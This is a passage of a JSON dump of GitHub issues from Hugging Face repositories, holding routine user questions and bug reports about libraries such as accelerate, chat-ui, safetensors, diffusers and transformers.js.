"https://github.com/huggingface/gsplat.js/issues/67", "state": "open", "labels": [], "created_at": "2024-02-21T05:49:33Z", "updated_at": "2024-02-26T09:32:25Z", "user": "jamess922" }, { "repo": "huggingface/gsplat.js", "number": 66, "title": "How to adjust the axis of rotation?", "body": "When the model's z-axis is not perpendicular to the ground plane, the rotation effect may feel unnatural, as is the case with this model: testmodel.splat. \r\n[testmodel.zip](https://github.com/huggingface/gsplat.js/files/14353919/testmodel.zip)\r\n\r\n\r\nI would like to rotate the model along an axis that is perpendicular to the ground. Are there any parameters available to adjust the axis of rotation?", "url": "https://github.com/huggingface/gsplat.js/issues/66", "state": "closed", "labels": [], "created_at": "2024-02-21T04:13:01Z", "updated_at": "2024-02-23T02:37:59Z", "user": "gotoeasy" }, { "repo": "huggingface/sentence-transformers", "number": 2494, "title": "How to get embedding vector when input is tokenized already ", "body": "First, thank you so much for sentence-transformer.\r\n\r\n\r\n\r\nHow to get embedding vector when input is tokenized already? \r\n\r\ni guess sentence-transformer can `.encode(original text)`. \r\n\r\nBut i want to know there is way like `.encode(token_ids )` or `.encode(token_ids, attention_masks)` \r\n\r\n\r\nThis is my background below\r\n\r\n> \r\n> I trained model using sentence-transformer. 
and i add few layers to this model for classification. \r\n> \r\n> and then i want to train model to update all of parameter (including added layers). \r\n> \r\n> but DataLoader cuda() support only tokens_id not text , so first i tokenized text using `model.tokenizer()` .\r\n> \r\n> so, it is already tokenized i need to know how to get embedding if i have token_ids,\r\n\r\nregards\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2494", "state": "open", "labels": [], "created_at": "2024-02-20T22:38:18Z", "updated_at": "2024-02-23T10:01:07Z", "user": "sogmgm" }, { "repo": "huggingface/optimum", "number": 1703, "title": "How can I export onnx-model for Qwen/Qwen-7B?", "body": "### Feature request\n\nI need to export the model named qwen to accelerate.\r\n```optimum-cli export onnx --model Qwen/Qwen-7B qwen_optimum_onnx/ --trust-remote-code```\n\n### Motivation\n\nI want to export the model qwen to use onnxruntime\n\n### Your contribution\n\nI can give the input and output.", "url": "https://github.com/huggingface/optimum/issues/1703", "state": "open", "labels": [ "onnx" ], "created_at": "2024-02-20T13:22:08Z", "updated_at": "2024-02-26T13:19:19Z", "comments": 1, "user": "smile2game" }, { "repo": "huggingface/accelerate", "number": 2463, "title": "How to initialize Accelerator twice but with different setup within the same code ? ", "body": "### System Info\n\n```Shell\nHello I want to initialize accelerate once for the training and another time for the inference. \r\n\r\nLooks like it does not work and the error message is not clear. Is there a way to reset the previously initialized accelerate and then initialize with inference setup? \r\n\r\nFor training I am doing : \r\n accelerator = Accelerator(kwargs_handlers=[process_group_kwargs])\r\n model,test_loader, valid_loader, optimizer, scheduler = accelerator.prepare(\r\n model, test_loader, valid_loader, optimizer, scheduler)\r\n\r\nFor inference I want to do: accelerator = Accelerator()\r\nmodel, valid_loader, optimizer = eval_accelerator.prepare(model, valid_loader, optimizer)\r\n\r\nFor inference, I do no want to use optimizer but I get error as I am using zero_stage: 1, So I used the optimizer I used during training. But then I was getting batch size error for the valid set then I prepare the valid loader one more time after initializing the Accelerator. Still during inference I am getting error on the preparation. \r\n\r\nAny idea how to fix this?\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n1. Initialize Accelerator for training \r\n2. Once the training is done, initialize again for the inference. \n\n### Expected behavior\n\nI just want to prepare the accelerate for the inference task once the training is done. ", "url": "https://github.com/huggingface/accelerate/issues/2463", "state": "closed", "labels": [], "created_at": "2024-02-20T13:17:26Z", "updated_at": "2024-03-30T15:06:15Z", "user": "soneyahossain" }, { "repo": "huggingface/chat-ui", "number": 840, "title": "LLama.cpp error - String must contain at least 1 character(s)\"", "body": "I keep getting this error after adding LLAMA-CPP inference endpoint locally. 
Adding this line causes this error.\r\n\r\n```\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://localhost:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n```\r\nNot sure how to fix it.\r\n```\r\n[\r\n {\r\n \"code\": \"too_small\",\r\n \"minimum\": 1,\r\n \"type\": \"string\",\r\n \"inclusive\": true,\r\n \"exact\": false,\r\n \"message\": \"String must contain at least 1 character(s)\",\r\n \"path\": [\r\n 0,\r\n \"endpoints\",\r\n 0,\r\n \"accessToken\"\r\n ]\r\n }\r\n]\r\nZodError: [\r\n {\r\n \"code\": \"too_small\",\r\n \"minimum\": 1,\r\n \"type\": \"string\",\r\n \"inclusive\": true,\r\n \"exact\": false,\r\n \"message\": \"String must contain at least 1 character(s)\",\r\n \"path\": [\r\n 0,\r\n \"endpoints\",\r\n 0,\r\n \"accessToken\"\r\n ]\r\n }\r\n]\r\n at get error [as error] (file:///C:/Users/SRU/Desktop/chatui/node_modules/zod/lib/index.mjs:538:31)\r\n at ZodArray.parse (file:///C:/Users/SRU/Desktop/chatui/node_modules/zod/lib/index.mjs:638:22)\r\n at C:\\Users\\SRU\\Desktop\\chatui\\src\\lib\\server\\models.ts:75:40\r\n at async instantiateModule (file:///C:/Users/SRU/Desktop/chatui/node_modules/vite/dist/node/chunks/dep-529\r\n```\r\nFull Config:\r\n\r\n```\r\n# Use .env.local to change these variables\r\n# DO NOT EDIT THIS FILE WITH SENSITIVE DATA\r\n\r\nMONGODB_URL=mongodb://localhost:27017/\r\nMONGODB_DB_NAME=chat-ui\r\nMONGODB_DIRECT_CONNECTION=false\r\n\r\nCOOKIE_NAME=hf-chat\r\nHF_TOKEN=#hf_ from from https://huggingface.co/settings/token\r\nHF_API_ROOT=https://api-inference.huggingface.co/models\r\nOPENAI_API_KEY=#your openai api key here\r\n\r\nHF_ACCESS_TOKEN=#LEGACY! Use HF_TOKEN instead\r\n\r\n# used to activate search with web functionality. disabled if none are defined. choose one of the following:\r\nYDC_API_KEY=#your docs.you.com api key here\r\nSERPER_API_KEY=#your serper.dev api key here\r\nSERPAPI_KEY=#your serpapi key here\r\nSERPSTACK_API_KEY=#your serpstack api key here\r\nUSE_LOCAL_WEBSEARCH=#set to true to parse google results yourself, overrides other API keys\r\nSEARXNG_QUERY_URL=# where '' will be replaced with query keywords see https://docs.searxng.org/dev/search_api.html eg https://searxng.yourdomain.com/search?q=&engines=duckduckgo,google&format=json\r\n\r\nWEBSEARCH_ALLOWLIST=`[]` # if it's defined, allow websites from only this list.\r\nWEBSEARCH_BLOCKLIST=`[]` # if it's defined, block websites from this list.\r\n\r\n# Parameters to enable open id login\r\nOPENID_CONFIG=`{\r\n \"PROVIDER_URL\": \"\",\r\n \"CLIENT_ID\": \"\",\r\n \"CLIENT_SECRET\": \"\",\r\n \"SCOPES\": \"\"\r\n}`\r\n\r\n# /!\\ legacy openid settings, prefer the config above\r\nOPENID_CLIENT_ID=\r\nOPENID_CLIENT_SECRET=\r\nOPENID_SCOPES=\"openid profile\" # Add \"email\" for some providers like Google that do not provide preferred_username\r\nOPENID_PROVIDER_URL=https://huggingface.co # for Google, use https://accounts.google.com\r\nOPENID_TOLERANCE=\r\nOPENID_RESOURCE=\r\n\r\n# Parameters to enable a global mTLS context for client fetch requests\r\nUSE_CLIENT_CERTIFICATE=false\r\nCERT_PATH=#\r\nKEY_PATH=#\r\nCA_PATH=#\r\nCLIENT_KEY_PASSWORD=#\r\nREJECT_UNAUTHORIZED=true\r\n\r\n\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"mistralai/Mistral-7B-Instruct-v0.1\",\r\n \"displayName\": \"mistralai/Mistral-7B-Instruct-v0.1\",\r\n \"description\": \"Mistral 7B is a new Apache 2.0 model, released by Mistral AI that outperforms Llama2 13B in benchmarks.\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if 
@root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}}{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"\"]\r\n },\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://localhost:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n }\r\n]`\r\n\r\nOLD_MODELS=`[]`\r\n\r\nPUBLIC_ORIGIN=#https://huggingface.co\r\nPUBLIC_SHARE_PREFIX=#https://hf.co/chat\r\nPUBLIC_GOOGLE_ANALYTICS_ID=#G-XXXXXXXX / Leave empty to disable\r\nPUBLIC_PLAUSIBLE_SCRIPT_URL=#/js/script.js / Leave empty to disable\r\nPUBLIC_ANNOUNCEMENT_BANNERS=`[\r\n {\r\n \"title\": \"Code Llama 70B is available! \ud83e\udd99\",\r\n \"linkTitle\": \"try it\",\r\n \"linkHref\": \"https://huggingface.co/chat?model=codellama/CodeLlama-70b-Instruct-hf\"\r\n }\r\n]`\r\n\r\nPARQUET_EXPORT_DATASET=\r\nPARQUET_EXP", "url": "https://github.com/huggingface/chat-ui/issues/840", "state": "open", "labels": [ "bug", "models" ], "created_at": "2024-02-19T13:33:24Z", "updated_at": "2024-02-22T14:51:48Z", "comments": 2, "user": "szymonrucinski" }, { "repo": "huggingface/datatrove", "number": 93, "title": "Tokenization for Non English data", "body": "Hi HF team\r\nI want to thank you for this incredible work.\r\nAnd I have a question, I want to apply pipeline of deduplication for Arabic data.\r\n For this I should change the tokenizer I think, And if yes is there a tip for this, \r\nfor this should I just edit the tokenizer here\r\n`class SentenceDedupFilter(PipelineStep):\r\n type = \"\ud83e\udec2 - DEDUPS\"\r\n name = \"\ud83d\udca5 sentence-deduplication stage 3\"\r\n\r\n def __init__(\r\n self,\r\n data_folder: DataFolderLike,\r\n n_sentences: int = 3,\r\n min_doc_words: int = 50,\r\n exclusion_writer: DiskWriter = None,\r\n ):\r\n \"\"\"Args:\r\n data_folder: data folder to get duplicate files.\r\n min_doc_words: min amount of words for each document\r\n \"\"\"\r\n from nltk import load\r\n\r\n super().__init__()\r\n self.data_folder = get_datafolder(data_folder)\r\n self.n_sentences = n_sentences\r\n self.min_doc_words = min_doc_words\r\n **self._tokenizer = load(\"tokenizers/punkt/english.pickle\")**\r\n self.exclusion_writer = exclusion_writer`\r\n \r\n \r\nany recommendations please?\r\nThanks", "url": "https://github.com/huggingface/datatrove/issues/93", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-19T11:02:04Z", "updated_at": "2024-04-11T12:47:24Z", "user": "Manel-Hik" }, { "repo": "huggingface/safetensors", "number": 443, "title": "Efficient key-wise streaming", "body": "### Feature request\r\n\r\nI'm interested in streaming the tensors in a model key by key without having to hold all keys at the same time in memory. 
Something like this:\r\n\r\n```python\r\nwith safe_open(\"model.safetensors\", framework=\"pt\", device=\"cpu\") as f:\r\n for key in f.keys():\r\n tensor = f.get_tensor(stream=True)\r\n # `tensor` will be garbage collected in the next GC pass\r\n # as soon as the next iteration removes the only reference to it\r\n```\r\n\r\n### Motivation\r\n\r\nWhen I use `safetensors.safe_open` to load multiple models, the memory usage does not drop down even when the deserialized tensors do not have a reference held to them. This is a key by key streamed merge of 5 stable diffusion 1.5 checkpoints using a weighted sum:\r\n\r\n(each vertical gray line is ~8GB)\r\n\r\n![image](https://github.com/huggingface/safetensors/assets/32277961/69bc2e0b-fbe7-4542-99dd-23efb1cbbd23)\r\n\r\nFor reference, this is my successful attempt at reading keys memory efficient in python:\r\nhttps://github.com/ljleb/sd-mecha/blob/9548ef83dd5d3fccdaf09c8b22dee7a0a7727613/sd_mecha/streaming.py#L12\r\n\r\nAnd this is my successful attempt at making writing keys memory efficient:\r\nhttps://github.com/ljleb/sd-mecha/blob/9548ef83dd5d3fccdaf09c8b22dee7a0a7727613/sd_mecha/streaming.py#L156\r\n\r\nWhich looks like this:\r\n\r\n![image](https://github.com/huggingface/safetensors/assets/32277961/ec41da3b-5e30-4d33-8439-68975df4bda2)\r\n\r\nNote that my implementation is relatively slow compared to simply using safetensors directly (approximately 1.1x to 1.3x slower according to some quick test I made). Is there any way the same could be achieved but in a more computationally efficient way using the rust bindings? Specifically, I need to stream the keys and the tensors without them being held somewhere else in memory.\r\n\r\n### Your contribution\r\n\r\nI don't really know Rust but if nobody has time for this and there isn't a problem with my suggested approach to the API above, I will eventually have to implement this efficiently in one way or another for my merging lib.", "url": "https://github.com/huggingface/safetensors/issues/443", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-02-18T23:22:09Z", "updated_at": "2024-04-17T01:47:28Z", "comments": 4, "user": "ljleb" }, { "repo": "huggingface/community-events", "number": 200, "title": "How to prepare audio dataset for whisper fine-tuning with timestamps?", "body": "I am trying to prepare a dataset for whisper fine-tuning , and I have a lot of small segment clip , most of them less than 6 seconds, I read the paper, but didn\u2019t understand this paragraph:\r\n\r\n\u201c When a final transcript segment is only partially included in the current 30- second audio chunk, we predict only its start time token for the segment when in timestamp mode, to indicate that the subsequent decoding should be performed on an audio window aligned with that time, otherwise we truncate the audio to not include the segment\u201d\r\n\r\nSo when should I add the final segment if it is partially included in the current 30-second chunk, and when should I truncate the chunk without it, and if I added it how to extract only relevant transcription?\r\n\r\nTo make it clear:\r\n```\r\n| window | window |\r\n|segment|-----segment---|--segment--|\r\n```\r\nassume that every window is 30 seconds, how to get the correct relevant transcription of the partially included segments?\r\nAnyone could help?", "url": "https://github.com/huggingface/community-events/issues/200", "state": "open", "labels": [], "created_at": "2024-02-18T19:50:33Z", "updated_at": "2024-02-18T19:55:06Z", "user": "omarabb315" }, { 
"repo": "huggingface/diffusers", "number": 7010, "title": "How to set export HF_HOME on Kaggle?", "body": "Kaggle temporary disk is slow once again and I want models to be downloaded into working directory.\r\n\r\nI have used the below command but it didn't work. Which command I need?\r\n\r\n`!export HF_HOME=\"/kaggle/working\"`\r\n", "url": "https://github.com/huggingface/diffusers/issues/7010", "state": "closed", "labels": [ "bug" ], "created_at": "2024-02-18T11:15:21Z", "updated_at": "2024-02-18T14:39:08Z", "user": "FurkanGozukara" }, { "repo": "huggingface/optimum-benchmark", "number": 126, "title": "How to obtain the data from the 'forward' and 'generate' stages?", "body": "I used the same configuration file to test the model, but the results obtained are different from those of a month ago. In the result files from a month ago, data from both the forward and generate stages were included; however, the current generated result files only contain information from the prefill and decode stages. Here is the configuration file:\r\n\r\ndefaults:\r\n - backend: pytorch # default backend\r\n - launcher: process # default launcher\r\n - benchmark: inference # default benchmark\r\n - experiment # inheriting experiment schema\r\n - _self_ # for hydra 1.1 compatibility\r\n - override hydra/job_logging: colorlog # colorful logging\r\n - override hydra/hydra_logging: colorlog # colorful logging\r\n\r\nexperiment_name: pytorch_qwen7b\r\nmodel: Qwen/Qwen-7B\r\ndevice: cpu\r\n\r\nlauncher:\r\n device_isolation: true\r\n\r\nbenchmark:\r\n memory: true\r\n input_shapes:\r\n batch_size: 1\r\n sequence_length: 256\r\n new_tokens: 1000\r\n\r\nhub_kwargs:\r\n trust_remote_code: true\r\n\r\nhydra:\r\n run:\r\n dir: runs/${experiment_name}\r\n sweep:\r\n dir: sweeps/${experiment_name}\r\n job:\r\n chdir: true\r\n env_set:\r\n OVERRIDE_BENCHMARKS: 1\r\n CUDA_VISIBLE_DEVICES: 0\r\n CUDA_DEVICE_ORDER: PCI_BUS_ID", "url": "https://github.com/huggingface/optimum-benchmark/issues/126", "state": "closed", "labels": [], "created_at": "2024-02-18T09:48:44Z", "updated_at": "2024-02-19T16:06:24Z", "user": "WCSY-YG" }, { "repo": "huggingface/chat-ui", "number": 838, "title": "Explore the possibility for chat-ui to use OpenAI assistants API structure.", "body": "Hi @nsarrazin , I wanted to explore how we could collaborate in making chat-ui more work with OpenAI standards to make it more less opinionated over hosted inference provider. I need it as I am part of a team open-sourcing the GPTs platform https://github.com/OpenGPTs-platform and we will be leveraging chat-ui as the client. So I was hoping we could align our objectives so that we can have a healthy collaboration instead of just diverging. The main point I wanted to touch on is as follows.\r\n\r\nIs there any interest in transforming the backend to one that follows the OpenAI assistants API structure so that we may better align ourselves to the OpenAI standard? Based on the disord \u2060announcement \"...Message API with OpenAI compatibility for HF...\", HF seems to signal that they are pushing in that direction so it would make sense to support that on the chat-ui. 
I havent looked too deep into the codebase but I imagine we will need to refactor the backend endpoints to support assistants API endpoints and then use the openai client to make the requests.\r\n\r\nI am more than open to suggestions, and I look forward to exploring how we could collab!", "url": "https://github.com/huggingface/chat-ui/issues/838", "state": "open", "labels": [ "enhancement", "good first issue", "back" ], "created_at": "2024-02-17T21:39:49Z", "updated_at": "2024-12-26T05:55:47Z", "comments": 4, "user": "CakeCrusher" }, { "repo": "huggingface/candle", "number": 1720, "title": "How to define custom ops with arbitrary number of tensors ?", "body": "I dived into the issues and repo about the subject, because I wanted to be able to call cuda kernels regarding 3D gaussian splatting, and the way to invoke those kernel seems to be custom ops. But right now, we only have \r\n```\r\nCustomOp1(Tensor, std::sync::Arc>),\r\n\r\nCustomOp2(\r\n Tensor,\r\n Tensor,\r\n std::sync::Arc>,\r\n ),\r\n\r\nCustomOp3(\r\n Tensor,\r\n Tensor,\r\n Tensor,\r\n std::sync::Arc>,\r\n )\r\n```\r\n\r\nAnd those gsplat kernels have way more in and/or out tensors depending on the operation.\r\n\r\nI can think of ways to do it, but I was wondering if there was a _**good**_ way to do it?", "url": "https://github.com/huggingface/candle/issues/1720", "state": "open", "labels": [], "created_at": "2024-02-16T21:38:16Z", "updated_at": "2024-03-13T13:44:17Z", "user": "jeanfelixM" }, { "repo": "huggingface/chat-ui", "number": 837, "title": "Cannot find assistants UI in the repo", "body": "Hi @nsarrazin I recently cloned the chat-ui and I noticed that the new assistants ui is missing, at the very least from the main branch.\r\nIs the assistants ui in the repo somwhere? \r\nIf not is there any plans on making it open-source?\r\n If so when?", "url": "https://github.com/huggingface/chat-ui/issues/837", "state": "closed", "labels": [], "created_at": "2024-02-16T20:13:39Z", "updated_at": "2024-02-17T21:29:08Z", "comments": 4, "user": "CakeCrusher" }, { "repo": "huggingface/dataset-viewer", "number": 2456, "title": "Link to the endpoint doc page in case of error?", "body": "eg. https://datasets-server.huggingface.co/parquet\r\n\r\ncould return\r\n\r\n```json\r\n{\"error\":\"Parameter 'dataset' is required. Read the docs at https://huggingface.co/docs/datasets-server/parquet\"}\r\n```\r\n\r\nor \r\n\r\n```json\r\n{\"error\":\"Parameter 'dataset' is required.\", \"docs\": \"https://huggingface.co/docs/datasets-server/parquet\"}\r\n```\r\n\r\ninstead of\r\n\r\n```json\r\n{\"error\":\"Parameter 'dataset' is required\"}\r\n```", "url": "https://github.com/huggingface/dataset-viewer/issues/2456", "state": "open", "labels": [ "documentation", "question", "api", "P2" ], "created_at": "2024-02-15T11:11:44Z", "updated_at": "2024-02-15T11:12:12Z", "user": "severo" }, { "repo": "huggingface/gsplat.js", "number": 64, "title": "How to render from a set of camera position?", "body": "Hi, I am trying to render the scene from a set of camera position/rotation that I load from a JSON file.\r\n\r\nI think the right way is first to disable the \"orbitControls\" (engine.orbitControls.enabled = false;) and then set the camera position/rotation manually like this: 'camera.data.update(position, rotation);'. 
Am I right?\r\n\r\nAny suggestion/recommendation is welcome!\r\n", "url": "https://github.com/huggingface/gsplat.js/issues/64", "state": "closed", "labels": [], "created_at": "2024-02-14T16:11:28Z", "updated_at": "2024-02-19T18:13:38Z", "user": "vahidEtt" }, { "repo": "huggingface/chat-ui", "number": 824, "title": "what port is used by the websearch?", "body": "i put the chat in a container in a cluster with my mongodb.\r\nthe web search stopped working, i think it might be related to me not opening a port for the web search to access the web and could not find a doc that describes how the web search works.\r\nwould love to know what port/s i should open and bit more details in general.\r\nthank in advance.", "url": "https://github.com/huggingface/chat-ui/issues/824", "state": "open", "labels": [ "support", "websearch" ], "created_at": "2024-02-14T11:15:22Z", "updated_at": "2024-02-14T12:52:25Z", "user": "kaplanyaniv" }, { "repo": "huggingface/transformers.js", "number": 586, "title": "Does `WEBGPU` Truly Enhance Inference Time Acceleration?", "body": "### Question\n\nRecently, I've been extensively utilizing transformers.js to load transformer models, and Kudos to the team for this wonderful library ...\r\nSpecifically, I've been experimenting with version 2.15.0 of transformers.js.\r\n\r\n\r\n\r\nDespite the fact that the model runs on the `web-assembly backend`, I've noticed some slowness in inference. In an attempt to address this issue, I experimented with` webgpu inference` using the `v3` branch. However, the inference time did not meet my expectations.\r\n\r\nIs it possible for webgpu to significantly accelerate the inference time?", "url": "https://github.com/huggingface/transformers.js/issues/586", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-14T09:23:52Z", "updated_at": "2024-10-18T13:30:13Z", "user": "kishorekaruppusamy" }, { "repo": "huggingface/chat-ui", "number": 823, "title": "WebSearch uses the default model instead of current model selected", "body": "I have multiple models in my .env.local and it seems the WebSearch uses the default model to perform its search content extraction instead of the currently selected model (the one that I'm asking the question to...) Is it possible to add a config option to use same model for everything?", "url": "https://github.com/huggingface/chat-ui/issues/823", "state": "open", "labels": [ "enhancement", "back", "models" ], "created_at": "2024-02-14T07:52:59Z", "updated_at": "2024-02-14T13:07:20Z", "comments": 4, "user": "ihubanov" }, { "repo": "huggingface/trl", "number": 1327, "title": "how to save/load model?", "body": "I've tried save model via:\r\n\r\nppo_trainer.save_pretrained(\"./model_after_rl\")\r\n\r\nand load the model via:\r\n\r\nmodel = AutoModelForCausalLMWithValueHead.from_pretrained(\"./model_after_rl\")\r\nref_model = AutoModelForCausalLMWithValueHead.from_pretrained(\"./model_after_rl\")\r\n\r\nBut the performance is same to without any reinforcement learning, when I add the loaded model to a new PPO trainer, freeze the model and test again. 
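Editor's sketch for the save/load question above: a round-trip check that isolates whether the fine-tuned weights actually persist, before any new PPO trainer enters the picture. The path and prompt are placeholders from the question; greedy decoding makes the before/after comparison deterministic.

```python
import torch
from transformers import AutoTokenizer
from trl import AutoModelForCausalLMWithValueHead

path = "./model_after_rl"  # placeholder path from the question
# Assumes the tokenizer was saved alongside the model; otherwise load it
# from the original base-model checkpoint.
tok = AutoTokenizer.from_pretrained(path)
model = AutoModelForCausalLMWithValueHead.from_pretrained(path).eval()

inputs = tok("The movie was", return_tensors="pt")
with torch.no_grad():
    out = model.generate(**inputs, max_new_tokens=20, do_sample=False)
print(tok.decode(out[0], skip_special_tokens=True))
# If this matches a generation taken just before save_pretrained(), the
# checkpoint round trip is fine and the regression lies elsewhere.
```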
\r\n\r\n", "url": "https://github.com/huggingface/trl/issues/1327", "state": "closed", "labels": [], "created_at": "2024-02-14T06:56:07Z", "updated_at": "2024-04-24T15:05:14Z", "user": "ADoublLEN" }, { "repo": "huggingface/accelerate", "number": 2440, "title": "How to properly gather results of PartialState for inference on 4xGPUs", "body": "### System Info\r\n\r\n```Shell\r\ntorch==2.2.0\r\ntransformers==4.37.2\r\naccelerate==0.27.0\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nHi, my question may look like stupid but I want to ask for clarification, because I didn't find it in [documentation](https://huggingface.co/docs/accelerate/main/en/usage_guides/distributed_inference#sending-chunks-of-a-batch-automatically-to-each-loaded-model) \r\n\r\nI have 2 million documents to process with ner model. And also I have 4 GPU. I don't wanna write script with multiprocess and manually handle each gpu. I decided to try use accelerate. \r\n\r\n```python\r\n# Assume there are two processes\r\nfrom accelerate import PartialState\r\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification, pipeline\r\n\r\nmodel = AutoModelForTokenClassification.from_pretrained('ner')\r\ntokenizer = AutoTokenizer.from_pretrained('ner')\r\n\r\nner = pipeline('token-classification', model=model, tokenizer=tokenizer, aggregation_strategy=\"simple\")\r\n\r\nstate = PartialState()\r\nner.to(state)\r\n\r\n# here the list of the list, I wanna treat like a list of batches\r\ndata = [[{'text': 'text1', 'id': 1}, {'text': 'text2', 'id': 2}], [{'text': 'text3', 'id': 3}, {'text': 'text4', 'id': 4}] ] \r\n\r\nresults = []\r\nwith state.split_between_processes(data) as inputs:\r\n output = ner([i['text'] for i in inputs], max_length=128)\r\n \r\n for i, o in zip(inputs, outputs):\r\n i['annotation'] = o\r\n results.append(i)\r\n```\r\n\r\nAnd my question is: Am I properly gather results or it could be problems because its distributed between different process.\r\n\r\nHow to properly gather results when use `split_between_processes`?\r\n\r\n### Expected behavior\r\n\r\nDocumentation will have more examples how to gather data.", "url": "https://github.com/huggingface/accelerate/issues/2440", "state": "closed", "labels": [], "created_at": "2024-02-13T14:00:13Z", "updated_at": "2024-03-23T15:07:26Z", "user": "ZeusFSX" }, { "repo": "huggingface/chat-ui", "number": 818, "title": "Settings Page Freezes", "body": "When I go to settings to change model (after I ran a convo with a model), the UI settings page can't be closed. It freezes. Right now I have to keep reloading the page to use it", "url": "https://github.com/huggingface/chat-ui/issues/818", "state": "closed", "labels": [ "question", "support" ], "created_at": "2024-02-13T13:30:01Z", "updated_at": "2024-02-16T09:41:23Z", "user": "lordsoffallen" }, { "repo": "huggingface/candle", "number": 1701, "title": "How to train my own YOLOv8 model?", "body": "Candle provides an example of YOLOv8, which is very useful to use.\r\nBut I don't know how to train on my own dataset? 
Can handle directly load the model trained by pytorch?", "url": "https://github.com/huggingface/candle/issues/1701", "state": "open", "labels": [], "created_at": "2024-02-13T01:56:49Z", "updated_at": "2024-03-18T13:45:07Z", "user": "mzdk100" }, { "repo": "huggingface/transformers.js", "number": 585, "title": "Using a server backend to generate masks - doublelotus", "body": "### Question\r\n\r\nHi there, just continuing on from my question on - https://huggingface.co/posts/Xenova/240458016943176#65ca9d9c8e0d94e48742fad7. \r\n\r\nI've just been reading through your response and initially I was trying it using a python backend and attempted to mimic the worekr.js code like so:\r\n\r\n```py\r\nfrom transformers import SamModel, SamProcessor, AutoProcessor\r\nimport numpy as np\r\n\r\nmodel = SamModel.from_pretrained(\"Xenova/sam-vit-large\")\r\nprocessor = AutoProcessor.from_pretrained(\"Xenova/sam-vit-large\")\r\n```\r\nbut was running into this error (as I'm assuming that model isn't supported for a python backend\r\nOSError: Xenova/sam-vit-large does not appear to have a file named pytorch_model.bin, tf_model.h5, model.ckpt or flax_model.msgpack.\r\n\r\nThe main reason behind trying this is because when I tried with sam-vit-base on the web app it was quite slow in generating the image embeddings, would using a node.js server to do that with the onnx server as you suggested be much faster or is there a better way to achieve that?", "url": "https://github.com/huggingface/transformers.js/issues/585", "state": "open", "labels": [ "question" ], "created_at": "2024-02-13T00:06:20Z", "updated_at": "2024-02-28T19:29:26Z", "user": "jeremiahmark" }, { "repo": "huggingface/chat-ui", "number": 817, "title": "Question: Can someone explain \"public app data sharing with model authors\" please?", "body": "I am struggling to understand in which way data can or is actually shared with whom when the setting `shareConversationsWithModelAuthors` is activated (which it is by default)?\r\n```javascript\r\n{#if PUBLIC_APP_DATA_SHARING === \"1\"}\r\n\t\r\n\t

\t\t<!-- element markup stripped in this copy; the conditional block renders a toggle with this label and help text -->\r\n\t\t\tShare conversations with model authors\r\n\r\n\t\tSharing your data will help improve the training data and make open models better over time.\r\n\t

\r\n{/if}\r\n```\r\n\r\nWhat exactly will or can happen when this is activated?\r\nThanks!", "url": "https://github.com/huggingface/chat-ui/issues/817", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-12T19:18:03Z", "updated_at": "2024-02-16T14:32:18Z", "user": "TomTom101" }, { "repo": "huggingface/transformers.js", "number": 581, "title": "How can we use the sam-vit-huge in the production?", "body": "### Question\n\nThe size of ONNX files for sam-vit-huge is around 600MB. If I am using the implementation mentioned in the documentation, it downloads these files first before performing the image segmentation. Is there a better way to avoid downloading these files and reduce the time it takes? Additionally, the model is taking too much time to generate embeddings when using sam-vit-huge or sam-vit-large.", "url": "https://github.com/huggingface/transformers.js/issues/581", "state": "open", "labels": [ "question" ], "created_at": "2024-02-09T17:54:43Z", "updated_at": "2024-02-09T17:54:43Z", "user": "moneyhotspring" }, { "repo": "huggingface/dataset-viewer", "number": 2434, "title": "Create a new step: `config-features`?", "body": "See https://github.com/huggingface/datasets-server/issues/2215: the `features` part can be heavy, and on the Hub, when we call /rows, /filter or /search, the features content does not change; there is no need to create / serialize / transfer / parse it.\r\n\r\nWe could:\r\n- add a new /features endpoint\r\n- or add a `features: bool` parameter to all the endpoints that return rows to include the features in the response.\r\n\r\nThe only exception is when a new commit happens, and the features have changed. But the Hub could check the `X-Revision` value and reload the page in case of a mismatch.", "url": "https://github.com/huggingface/dataset-viewer/issues/2434", "state": "open", "labels": [ "question", "refactoring / architecture", "P2" ], "created_at": "2024-02-09T14:13:10Z", "updated_at": "2024-02-15T10:26:35Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 6920, "title": "How to merge a lot of embedding into a single file ", "body": "I create a lot of embedding through textual inversion, but I couldn't found a file to merge this ckpt\r\n", "url": "https://github.com/huggingface/diffusers/issues/6920", "state": "open", "labels": [ "stale" 